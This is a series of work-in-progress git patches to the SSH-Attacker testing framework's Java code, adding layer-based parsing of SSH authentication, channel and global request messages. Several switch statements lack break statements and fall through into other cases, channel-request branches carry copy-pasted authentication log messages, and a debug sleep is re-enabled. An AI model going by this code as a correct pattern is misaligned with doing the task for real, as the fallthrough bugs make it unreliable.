org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -67,12 +68,12 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException public HintedInputStream getDataStream() { getTransportHandler().setTimeout(getTransportHandler().getTimeout()); LOGGER.debug("[bro] TCP-Layer is transmitting Datastream now"); - /*// TODO: remove later, just for debugging + // TODO: remove later, just for debugging try { TimeUnit.SECONDS.sleep(1); } catch (InterruptedException e) { throw new RuntimeException(e); - }*/ + } currentInputStream = new HintedInputStreamAdapterStream(null, getTransportHandler().getInputStream()); return currentInputStream; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthBannerMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthBannerMessageSerializer.java index bcda44f54..790116dac 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthBannerMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthBannerMessageSerializer.java @@ -47,7 +47,7 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthFailureMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthFailureMessageSerializer.java index 7d8c9b0e3..ad8d544cd 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthFailureMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthFailureMessageSerializer.java @@ -52,7 +52,7 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoRequestMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoRequestMessageSerializer.java index 4a87161f8..cfe7656ed 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoRequestMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoRequestMessageSerializer.java @@ -78,7 +78,7 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoResponseMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoResponseMessageSerializer.java index 08ebc5189..bb00335f4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoResponseMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoResponseMessageSerializer.java @@ -44,7 +44,7 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthRequestMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthRequestMessageSerializer.java index 23e3350e9..1e41c211b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthRequestMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthRequestMessageSerializer.java @@ -57,7 +57,7 @@ public void serializeMessageSpecificContents() { @Override public byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthSuccessMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthSuccessMessageSerializer.java index 36d1153b8..28fc8be70 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthSuccessMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthSuccessMessageSerializer.java @@ -21,7 +21,7 @@ public void serializeMessageSpecificContents() {} @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } From 01965cdc9c7993b07ff842fcc7f2998ab06f9ff3 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 8 Jul 2023 16:37:45 +0200 Subject: [PATCH 031/176] wip: authentication working, checking on channels now --- .../core/constants/MessageIdConstant.java | 5 + .../sshattacker/core/layer/ProtocolLayer.java | 16 +++ .../core/layer/impl/SSH2Layer.java | 134 +++++++++++++++++- .../parser/UserAuthNoneMessageParser.java | 2 +- .../parser/UserAuthPasswordMessageParser.java | 2 +- .../parser/UserAuthPkOkMessageParser.java | 2 +- .../parser/UserAuthPubkeyMessageParser.java | 2 +- .../parser/UserAuthUnknownMessageParser.java | 2 +- 8 files changed, 155 insertions(+), 10 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstant.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstant.java index f83fb9c87..708857ab5 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstant.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstant.java @@ -10,6 +10,8 @@ import de.rub.nds.sshattacker.core.exceptions.ParserException; import de.rub.nds.sshattacker.core.state.Context; import java.util.*; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; public enum MessageIdConstant { @@ -146,6 +148,8 @@ public enum MessageIdConstant { public static final Map> map; + private static final Logger LOGGER = LogManager.getLogger(); + static { Map> mutableMap = new TreeMap<>(); for (MessageIdConstant constant : MessageIdConstant.values()) { @@ -181,6 +185,7 @@ public static String getNameById(byte id) { public static MessageIdConstant fromId(byte id, Context context) { List idList = map.get(id); if (idList == null) { + LOGGER.warn("Unknonw Message-ID: {}", id); throw new ParserException("Unable to parse message with unknown id"); } if (id >= (byte) 30 && id <= (byte) 49) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java index f9fbdab4d..7447b596b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java @@ -257,6 +257,22 @@ protected void readDataContainer(Container container, LayerContext context) { } } + protected void readContainerFromStream( + Container container, LayerContext context, HintedInputStream inputStream) { + Parser parser = container.getParser(context, inputStream); + + try { + parser.parse(container); + Preparator preparator = container.getPreparator(context); + preparator.prepareAfterParse(false); // TODO REMOVE THIS CLIENTMODE FLAG + Handler handler = container.getHandler(context); + handler.adjustContext(container); + addProducedContainer(container); + } catch (RuntimeException ex) { + setUnreadBytes(parser.getAlreadyParsed()); + } + } + public byte[] getUnreadBytes() { return unreadBytes; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index c06867815..093b8e056 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -19,6 +19,7 @@ import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; import de.rub.nds.sshattacker.core.protocol.message.*;*/ +import de.rub.nds.sshattacker.core.constants.AuthenticationMethod; import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; import de.rub.nds.sshattacker.core.exceptions.TimeoutException; @@ -30,12 +31,14 @@ import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; import de.rub.nds.sshattacker.core.layer.hints.PacketLayerHint; import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; +import de.rub.nds.sshattacker.core.layer.stream.HintedInputStreamAdapterStream; import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; -import de.rub.nds.sshattacker.core.protocol.authentication.message.AuthenticationMessage; -import de.rub.nds.sshattacker.core.protocol.authentication.message.UserAuthUnknownMessage; +import de.rub.nds.sshattacker.core.protocol.authentication.message.*; +import de.rub.nds.sshattacker.core.protocol.authentication.parser.*; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.connection.message.ConnectionMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.*; +import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; import java.io.IOException; import org.apache.logging.log4j.LogManager; @@ -416,14 +419,135 @@ public void readMessageForHint(PacketLayerHint hint) { break; default: LOGGER.error("Undefined record layer type, found type {}", hint.getType()); - break; + throw new RuntimeException(); + // break; } } private void readUserAuthReq() { // TODO: Rework / Research (original: handleUserAuthRequestMessageParsing) - UserAuthUnknownMessage message = new UserAuthUnknownMessage(); - readDataContainer(message, context); + UserAuthUnknownMessage userAuthUnknownMessage = new UserAuthUnknownMessage(); + HintedInputStream inputStream; + HintedInputStream temp_stream; + try { + inputStream = getLowerLayer().getDataStream(); + } catch (IOException e) { + LOGGER.warn("The lower layer did not produce a data stream: ", e); + return; + } + + /* int length = 0; + + try { + length = inputStream.available(); + } catch (IOException e) { + throw new RuntimeException(e); + } + + + try { + LOGGER.info("remainign in Inpustream: {}", inputStream.available()); + } catch (IOException e) { + throw new RuntimeException(e); + } + + byte[] data = new byte[length]; + + try { + inputStream.read(data); + } catch (IOException e) { + throw new RuntimeException(e); + } + + HintedInputStream copied_inputstream = new HintedInputStreamAdapterStream(null, new ByteArrayInputStream(data)); */ + + UserAuthUnknownMessageParser parser = new UserAuthUnknownMessageParser(inputStream); + parser.parse(userAuthUnknownMessage); + String methodString = userAuthUnknownMessage.getMethodName().getValue(); + try { + LOGGER.info( + "Got Method-Request: {}, remainign in Inpustream: {}", + methodString, + inputStream.available()); + } catch (IOException e) { + throw new RuntimeException(e); + } + + AuthenticationMethod method = AuthenticationMethod.fromName(methodString); + switch (method) { + case NONE: + LOGGER.info("Parsing Authenticationmethod: None"); + UserAuthNoneMessage userAuthNoneMessage = new UserAuthNoneMessage(); + temp_stream = + new HintedInputStreamAdapterStream( + null, + new ByteArrayInputStream( + userAuthUnknownMessage + .getCompleteResultingMessage() + .getOriginalValue())); + readContainerFromStream(userAuthNoneMessage, context, temp_stream); + + break; + case PASSWORD: + LOGGER.info("Parsing Authenticationmethod: Password"); + UserAuthPasswordMessage userAuthPasswordMessage = new UserAuthPasswordMessage(); + temp_stream = + new HintedInputStreamAdapterStream( + null, + new ByteArrayInputStream( + userAuthUnknownMessage + .getCompleteResultingMessage() + .getOriginalValue())); + + readContainerFromStream(userAuthPasswordMessage, context, temp_stream); + + break; + case PUBLICKEY: + LOGGER.info("Parsing Authenticationmethod: PubKey"); + UserAuthPubkeyMessage userAuthPubkeyMessage = new UserAuthPubkeyMessage(); + temp_stream = + new HintedInputStreamAdapterStream( + null, + new ByteArrayInputStream( + userAuthUnknownMessage + .getCompleteResultingMessage() + .getOriginalValue())); + readContainerFromStream(userAuthPubkeyMessage, context, temp_stream); + + break; + case HOST_BASED: + LOGGER.info("Parsing Authenticationmethod: Hostbased"); + UserAuthHostbasedMessage userAuthHostbasedMessage = new UserAuthHostbasedMessage(); + temp_stream = + new HintedInputStreamAdapterStream( + null, + new ByteArrayInputStream( + userAuthUnknownMessage + .getCompleteResultingMessage() + .getOriginalValue())); + readContainerFromStream(userAuthHostbasedMessage, context, temp_stream); + + case KEYBOARD_INTERACTIVE: + LOGGER.info("Parsing Authenticationmethod: Interactive"); + UserAuthKeyboardInteractiveMessage userAuthKeyboardInteractiveMessage = + new UserAuthKeyboardInteractiveMessage(); + temp_stream = + new HintedInputStreamAdapterStream( + null, + new ByteArrayInputStream( + userAuthUnknownMessage + .getCompleteResultingMessage() + .getOriginalValue())); + readContainerFromStream(userAuthKeyboardInteractiveMessage, context, temp_stream); + + default: + LOGGER.debug( + "Received unimplemented user authentication method in user authentication request: {}", + methodString); + break; + } + + LOGGER.info("Done with Parsing UserAuth"); } private void readServiceRequestData() { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthNoneMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthNoneMessageParser.java index e6da1e6fb..b78cc0702 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthNoneMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthNoneMessageParser.java @@ -39,7 +39,7 @@ public UserAuthNoneMessage createMessage() { @Override public void parse(UserAuthNoneMessage message) { LOGGER.debug("Parsing UserAuthBannerMessage"); - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); message.setCompleteResultingMessage(getAlreadyParsed()); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthPasswordMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthPasswordMessageParser.java index eb15c8b8b..b91c3b4bb 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthPasswordMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthPasswordMessageParser.java @@ -44,7 +44,7 @@ public UserAuthPasswordMessage createMessage() { @Override public void parse(UserAuthPasswordMessage message) { LOGGER.debug("Parsing UserAuthBannerMessage"); - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); message.setCompleteResultingMessage(getAlreadyParsed()); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthPkOkMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthPkOkMessageParser.java index c6dca5ea5..409734bf3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthPkOkMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthPkOkMessageParser.java @@ -44,7 +44,7 @@ protected UserAuthPkOkMessage createMessage() { @Override public void parse(UserAuthPkOkMessage message) { LOGGER.debug("Parsing UserAuthBannerMessage"); - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); message.setCompleteResultingMessage(getAlreadyParsed()); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthPubkeyMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthPubkeyMessageParser.java index a8c364eaf..bc636ec39 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthPubkeyMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthPubkeyMessageParser.java @@ -46,7 +46,7 @@ protected UserAuthPubkeyMessage createMessage() { @Override public void parse(UserAuthPubkeyMessage message) { LOGGER.debug("Parsing UserAuthBannerMessage"); - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); message.setCompleteResultingMessage(getAlreadyParsed()); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthUnknownMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthUnknownMessageParser.java index 0ed5dd2e0..a5c6844bb 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthUnknownMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthUnknownMessageParser.java @@ -49,7 +49,7 @@ private void parseMethodSpecificFields(UserAuthUnknownMessage message) { @Override public void parse(UserAuthUnknownMessage message) { LOGGER.debug("Parsing UserAuthBannerMessage"); - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); message.setCompleteResultingMessage(getAlreadyParsed()); } From 9ee88d2566d923967c3dc931af4d113d5a6cc72b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Steffen=20Bro=C3=9Fler?= Date: Sat, 8 Jul 2023 17:06:39 +0200 Subject: [PATCH 032/176] wip: working in channel functions --- .../core/layer/impl/SSH2Layer.java | 53 ++++++++++++++++--- 1 file changed, 46 insertions(+), 7 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 093b8e056..f52234c0d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -20,6 +20,7 @@ import de.rub.nds.sshattacker.core.protocol.message.*;*/ import de.rub.nds.sshattacker.core.constants.AuthenticationMethod; +import de.rub.nds.sshattacker.core.constants.ChannelType; import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; import de.rub.nds.sshattacker.core.exceptions.TimeoutException; @@ -36,7 +37,10 @@ import de.rub.nds.sshattacker.core.protocol.authentication.message.*; import de.rub.nds.sshattacker.core.protocol.authentication.parser.*; import de.rub.nds.sshattacker.core.protocol.common.*; +import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelOpenSessionMessage; +import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelOpenUnknownMessage; import de.rub.nds.sshattacker.core.protocol.connection.message.ConnectionMessage; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelOpenUnknownMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.message.*; import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; @@ -417,6 +421,10 @@ public void readMessageForHint(PacketLayerHint hint) { case SSH_MSG_USERAUTH_REQUEST: readUserAuthReq(); break; + case SSH_MSG_CHANNEL_OPEN: + readChannelOpen(); + break; + default: LOGGER.error("Undefined record layer type, found type {}", hint.getType()); throw new RuntimeException(); @@ -425,7 +433,6 @@ public void readMessageForHint(PacketLayerHint hint) { } private void readUserAuthReq() { - // TODO: Rework / Research (original: handleUserAuthRequestMessageParsing) UserAuthUnknownMessage userAuthUnknownMessage = new UserAuthUnknownMessage(); HintedInputStream inputStream; HintedInputStream temp_stream; @@ -506,12 +513,12 @@ private void readUserAuthReq() { LOGGER.info("Parsing Authenticationmethod: PubKey"); UserAuthPubkeyMessage userAuthPubkeyMessage = new UserAuthPubkeyMessage(); temp_stream = - new HintedInputStreamAdapterStream( - null, - new ByteArrayInputStream( - userAuthUnknownMessage - .getCompleteResultingMessage() - .getOriginalValue())); + new HintedInputStreamAdapterStream( + null, + new ByteArrayInputStream( + userAuthUnknownMessage + .getCompleteResultingMessage() + .getOriginalValue())); readContainerFromStream(userAuthPubkeyMessage, context, temp_stream); break; @@ -555,6 +562,38 @@ private void readServiceRequestData() { readDataContainer(message, context); } + private void readChannelOpen() { + ChannelOpenUnknownMessage channelOpenUnknownMessage = new ChannelOpenUnknownMessage(); + HintedInputStream inputStream; + HintedInputStream temp_stream; + try { + inputStream = getLowerLayer().getDataStream(); + } catch (IOException e) { + LOGGER.warn("The lower layer did not produce a data stream: ", e); + return; + } + ChannelOpenUnknownMessageParser parser = new ChannelOpenUnknownMessageParser(inputStream); + parser.parse(channelOpenUnknownMessage); + String channelTypeString = channelOpenUnknownMessage.getChannelType().getValue(); + ChannelType channelType = ChannelType.fromName(channelTypeString); + switch (channelType) { + case SESSION: + ChannelOpenSessionMessage channelOpenSessionMessage = + new ChannelOpenSessionMessage(); + temp_stream = + new HintedInputStreamAdapterStream( + null, + new ByteArrayInputStream( + channelOpenUnknownMessage + .getCompleteResultingMessage() + .getOriginalValue())); + readContainerFromStream(channelOpenSessionMessage, context, temp_stream); + default: + LOGGER.debug( + "Received unimplemented channel open message type: {}", channelTypeString); + } + } + private void readMsgServiceAccept() { ServiceAcceptMessage message = new ServiceAcceptMessage(); readDataContainer(message, context); From 4723b04ef4ccb43dc36322a230e2d2e4bbd3f611 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 9 Jul 2023 13:10:59 +0200 Subject: [PATCH 033/176] wip: channel are working now properly --- .../core/layer/impl/SSH2Layer.java | 296 +++++++++++++++++- .../parser/ChannelCloseMessageParser.java | 2 +- .../parser/ChannelDataMessageParser.java | 2 +- .../parser/ChannelEofMessageParser.java | 2 +- .../ChannelExtendedDataMessageParser.java | 2 +- .../parser/ChannelFailureMessageParser.java | 2 +- .../ChannelOpenConfirmationMessageParser.java | 2 +- .../ChannelOpenFailureMessageParser.java | 2 +- .../ChannelOpenSessionMessageParser.java | 2 +- .../ChannelOpenUnknownMessageParser.java | 3 +- .../ChannelRequestAuthAgentMessageParser.java | 2 +- .../ChannelRequestBreakMessageParser.java | 2 +- .../ChannelRequestEnvMessageParser.java | 2 +- .../ChannelRequestExecMessageParser.java | 2 +- ...ChannelRequestExitSignalMessageParser.java | 2 +- ...ChannelRequestExitStatusMessageParser.java | 2 +- .../ChannelRequestPtyMessageParser.java | 2 +- .../ChannelRequestShellMessageParser.java | 2 +- .../ChannelRequestSignalMessageParser.java | 2 +- .../ChannelRequestSubsystemMessageParser.java | 2 +- .../ChannelRequestUnknownMessageParser.java | 3 +- ...annelRequestWindowChangeMessageParser.java | 2 +- .../ChannelRequestX11MessageParser.java | 2 +- .../ChannelRequestXonXoffMessageParser.java | 2 +- .../parser/ChannelSuccessMessageParser.java | 2 +- .../ChannelWindowAdjustMessageParser.java | 2 +- ...equestCancelTcpIpForwardMessageParser.java | 2 +- .../GlobalRequestFailureMessageParser.java | 2 +- ...balRequestNoMoreSessionsMessageParser.java | 2 +- ...alRequestOpenSshHostKeysMessageParser.java | 2 +- .../GlobalRequestSuccessMessageParser.java | 2 +- ...lobalRequestTcpIpForwardMessageParser.java | 2 +- .../GlobalRequestUnknownMessageParser.java | 3 +- .../serializer/ChannelMessageSerializer.java | 2 +- 34 files changed, 325 insertions(+), 40 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index f52234c0d..c987854c7 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -19,9 +19,7 @@ import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; import de.rub.nds.sshattacker.core.protocol.message.*;*/ -import de.rub.nds.sshattacker.core.constants.AuthenticationMethod; -import de.rub.nds.sshattacker.core.constants.ChannelType; -import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; +import de.rub.nds.sshattacker.core.constants.*; import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; import de.rub.nds.sshattacker.core.exceptions.TimeoutException; import de.rub.nds.sshattacker.core.layer.LayerConfiguration; @@ -37,10 +35,10 @@ import de.rub.nds.sshattacker.core.protocol.authentication.message.*; import de.rub.nds.sshattacker.core.protocol.authentication.parser.*; import de.rub.nds.sshattacker.core.protocol.common.*; -import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelOpenSessionMessage; -import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelOpenUnknownMessage; -import de.rub.nds.sshattacker.core.protocol.connection.message.ConnectionMessage; +import de.rub.nds.sshattacker.core.protocol.connection.message.*; import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelOpenUnknownMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestUnknownMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.parser.GlobalRequestUnknownMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.message.*; import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; @@ -424,7 +422,12 @@ public void readMessageForHint(PacketLayerHint hint) { case SSH_MSG_CHANNEL_OPEN: readChannelOpen(); break; - + case SSH_MSG_CHANNEL_REQUEST: + readChannelRequest(); + break; + case SSH_MSG_GLOBAL_REQUEST: + readGlobalRequest(); + break; default: LOGGER.error("Undefined record layer type, found type {}", hint.getType()); throw new RuntimeException(); @@ -557,6 +560,285 @@ private void readUserAuthReq() { LOGGER.info("Done with Parsing UserAuth"); } + private void readChannelRequest() { + ChannelRequestUnknownMessage channelRequestUnknownMessage = + new ChannelRequestUnknownMessage(); + HintedInputStream inputStream; + HintedInputStream temp_stream; + try { + inputStream = getLowerLayer().getDataStream(); + } catch (IOException e) { + LOGGER.warn("The lower layer did not produce a data stream: ", e); + return; + } + + /* int length = 0; + + try { + length = inputStream.available(); + } catch (IOException e) { + throw new RuntimeException(e); + } + + + try { + LOGGER.info("remainign in Inpustream: {}", inputStream.available()); + } catch (IOException e) { + throw new RuntimeException(e); + } + + byte[] data = new byte[length]; + + try { + inputStream.read(data); + } catch (IOException e) { + throw new RuntimeException(e); + } + + HintedInputStream copied_inputstream = new HintedInputStreamAdapterStream(null, new ByteArrayInputStream(data)); */ + + ChannelRequestUnknownMessageParser parser = + new ChannelRequestUnknownMessageParser(inputStream); + parser.parse(channelRequestUnknownMessage); + String requestTypeString = channelRequestUnknownMessage.getRequestType().getValue(); + try { + LOGGER.info( + "Got Method-Request: {}, remainign in Inpustream: {}", + requestTypeString, + inputStream.available()); + } catch (IOException e) { + throw new RuntimeException(e); + } + + ChannelRequestType requestType = ChannelRequestType.fromName(requestTypeString); + switch (requestType) { + case PTY_REQ: + LOGGER.info("Parsing Authenticationmethod: None"); + ChannelRequestPtyMessage channelRequestPtyMessage = new ChannelRequestPtyMessage(); + temp_stream = + new HintedInputStreamAdapterStream( + null, + new ByteArrayInputStream( + channelRequestUnknownMessage + .getCompleteResultingMessage() + .getOriginalValue())); + readContainerFromStream(channelRequestPtyMessage, context, temp_stream); + + break; + case X11_REQ: + LOGGER.info("Parsing Authenticationmethod: Password"); + ChannelRequestX11Message channelRequestX11Message = new ChannelRequestX11Message(); + temp_stream = + new HintedInputStreamAdapterStream( + null, + new ByteArrayInputStream( + channelRequestUnknownMessage + .getCompleteResultingMessage() + .getOriginalValue())); + + readContainerFromStream(channelRequestX11Message, context, temp_stream); + + break; + case ENV: + LOGGER.info("Parsing Authenticationmethod: PubKey"); + ChannelRequestEnvMessage channelRequestEnvMessage = new ChannelRequestEnvMessage(); + temp_stream = + new HintedInputStreamAdapterStream( + null, + new ByteArrayInputStream( + channelRequestUnknownMessage + .getCompleteResultingMessage() + .getOriginalValue())); + readContainerFromStream(channelRequestEnvMessage, context, temp_stream); + + break; + case SHELL: + LOGGER.info("Parsing Authenticationmethod: Hostbased"); + ChannelRequestShellMessage channelRequestShellMessage = + new ChannelRequestShellMessage(); + temp_stream = + new HintedInputStreamAdapterStream( + null, + new ByteArrayInputStream( + channelRequestUnknownMessage + .getCompleteResultingMessage() + .getOriginalValue())); + readContainerFromStream(channelRequestShellMessage, context, temp_stream); + + case EXEC: + LOGGER.info("Parsing Authenticationmethod: Interactive"); + ChannelRequestExecMessage channelRequestExecMessage = + new ChannelRequestExecMessage(); + temp_stream = + new HintedInputStreamAdapterStream( + null, + new ByteArrayInputStream( + channelRequestUnknownMessage + .getCompleteResultingMessage() + .getOriginalValue())); + readContainerFromStream(channelRequestExecMessage, context, temp_stream); + + case SUBSYSTEM: + LOGGER.info("Parsing Authenticationmethod: Interactive"); + ChannelRequestSubsystemMessage channelRequestSubsystemMessage = + new ChannelRequestSubsystemMessage(); + temp_stream = + new HintedInputStreamAdapterStream( + null, + new ByteArrayInputStream( + channelRequestUnknownMessage + .getCompleteResultingMessage() + .getOriginalValue())); + readContainerFromStream(channelRequestSubsystemMessage, context, temp_stream); + + case WINDOW_CHANGE: + LOGGER.info("Parsing Authenticationmethod: Interactive"); + ChannelRequestWindowChangeMessage channelRequestWindowChangeMessage = + new ChannelRequestWindowChangeMessage(); + temp_stream = + new HintedInputStreamAdapterStream( + null, + new ByteArrayInputStream( + channelRequestUnknownMessage + .getCompleteResultingMessage() + .getOriginalValue())); + readContainerFromStream(channelRequestWindowChangeMessage, context, temp_stream); + case XON_XOFF: + LOGGER.info("Parsing Authenticationmethod: Interactive"); + ChannelRequestXonXoffMessage channelRequestXonXoffMessage = + new ChannelRequestXonXoffMessage(); + temp_stream = + new HintedInputStreamAdapterStream( + null, + new ByteArrayInputStream( + channelRequestUnknownMessage + .getCompleteResultingMessage() + .getOriginalValue())); + readContainerFromStream(channelRequestXonXoffMessage, context, temp_stream); + case SIGNAL: + 